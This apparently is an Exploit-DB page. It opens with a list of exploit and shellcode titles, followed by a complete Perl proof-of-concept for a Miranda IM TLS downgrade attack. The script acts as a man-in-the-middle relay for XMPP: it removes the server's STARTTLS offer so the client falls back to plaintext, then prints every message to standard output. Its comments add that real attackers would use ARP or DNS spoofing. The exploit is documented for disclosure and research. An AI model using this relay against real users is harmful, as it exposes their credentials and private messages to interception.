
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
111 lines
No EOL
3.5 KiB
Perl
Executable file
111 lines
No EOL
3.5 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/39209/info
|
|
|
|
Miranda IM is prone to an information-disclosure vulnerability.
|
|
|
|
Successful exploits of this issue may allow attackers to perform man-in-the-middle attacks against vulnerable applications and to disclose sensitive information.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
# Miranda IM TLS MitM Proof of Concept
|
|
# by Jan Schejbal, 2010-03-19
|
|
|
|
# MAY WORK WITHOUT MODIFICATIONS AGAINST OTHER CLIENTS WITH THIS ISSUE!
|
|
# Generally: Will work if client also accepts unencrypted connections
|
|
# if the server reports that TLS is not supported.
|
|
|
|
# Tested only on WinXP SP3 with ActivePerl 5.10.0
|
|
# against Miranda 0.8.16
|
|
|
|
# Usage:
|
|
# 1. Setup variables below, unless you want to test against jabber.ccc.de
|
|
# (note that this script does not do real XML parsing. Other servers
|
|
# might have slightly different code that will not be detected.
|
|
# In such a case, connecting will lock up. Adapt the RegExp below.)
|
|
# 2. Make 'victim' connect to this server instead of real server
|
|
# Network->Jabber->Account->Manually specify connection host
|
|
# (real attacks would use ARP spoofing, DNS spoofing or similar.)
|
|
# 3. Enable 'Use TLS'
|
|
# (make sure that 'Disable SASL' on advanced is UNCHECKED,
|
|
# as it silently disables TLS!)
|
|
# 4. Start script and connect with miranda
|
|
# 5. If all works, the dump goes to STDOUT, state is shown on STDERR.
|
|
# (All traffic should be sent in plain now!)
|
|
|
|
|
|
use strict;
|
|
use warnings;
|
|
|
|
use IO::Socket;
|
|
use IO::Select;
|
|
|
|
my $server = 'jabber.ccc.de';
|
|
my $port = 5222;
|
|
my $listenport = $port;
|
|
|
|
my $sock = new IO::Socket::INET(
|
|
LocalHost => '0.0.0.0',
|
|
LocalPort => $listenport,
|
|
Proto => 'tcp',
|
|
Listen => 1,
|
|
Reuse => 1,
|
|
);
|
|
|
|
print STDERR "Listening on $listenport for jabber connections\n";
|
|
print STDERR "Will forward to $server:$port\n";
|
|
|
|
my $client_connection = $sock->accept();
|
|
|
|
print STDERR "Incoming connection\n";
|
|
|
|
my $server_connection = new IO::Socket::INET(
|
|
PeerAddr => $server,
|
|
PeerPort => $port,
|
|
Proto => 'tcp',
|
|
);
|
|
|
|
print STDERR "Connected to server\n";
|
|
|
|
$server_connection->blocking(0);
|
|
$client_connection->blocking(0);
|
|
|
|
|
|
my $sel = IO::Select->new();
|
|
$sel->add($server_connection);
|
|
$sel->add($client_connection);
|
|
|
|
my $server_hello_done = 0;
|
|
my $server_hello_data;
|
|
|
|
my $readdata;
|
|
my @ready;
|
|
while(@ready = $sel->can_read()) {
|
|
foreach my $ready_conn (@ready) {
|
|
if (!sysread($ready_conn, $readdata, 10000)) {
|
|
print STDERR "\nReading failed!\n";
|
|
exit(1);
|
|
}
|
|
print "$readdata\n";
|
|
if ($ready_conn == $server_connection) {
|
|
# read was from server
|
|
if (!$server_hello_done) {
|
|
$server_hello_data .= $readdata;
|
|
print STDERR "\nCurrent server hello buf: $server_hello_data\n\n";
|
|
if ($server_hello_data =~ s|<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>||) {
|
|
print STDERR "removed STARTTLS offer from server hello\n";
|
|
$server_hello_done = 1;
|
|
print $client_connection $server_hello_data;
|
|
print STDERR "\nforwarded cached server hello buf: \n$server_hello_data\n\n";
|
|
print STDERR "MitM complete. Forwarding data ('<' = to client, '>' = to server)\n";
|
|
}
|
|
} else {
|
|
print $client_connection $readdata;
|
|
if ($server_hello_done) { print STDERR '<'; }
|
|
}
|
|
|
|
} else {
|
|
# read was from client, send to server
|
|
print $server_connection $readdata;
|
|
if ($server_hello_done) { print STDERR '>'; }
|
|
}
|
|
}
|
|
} |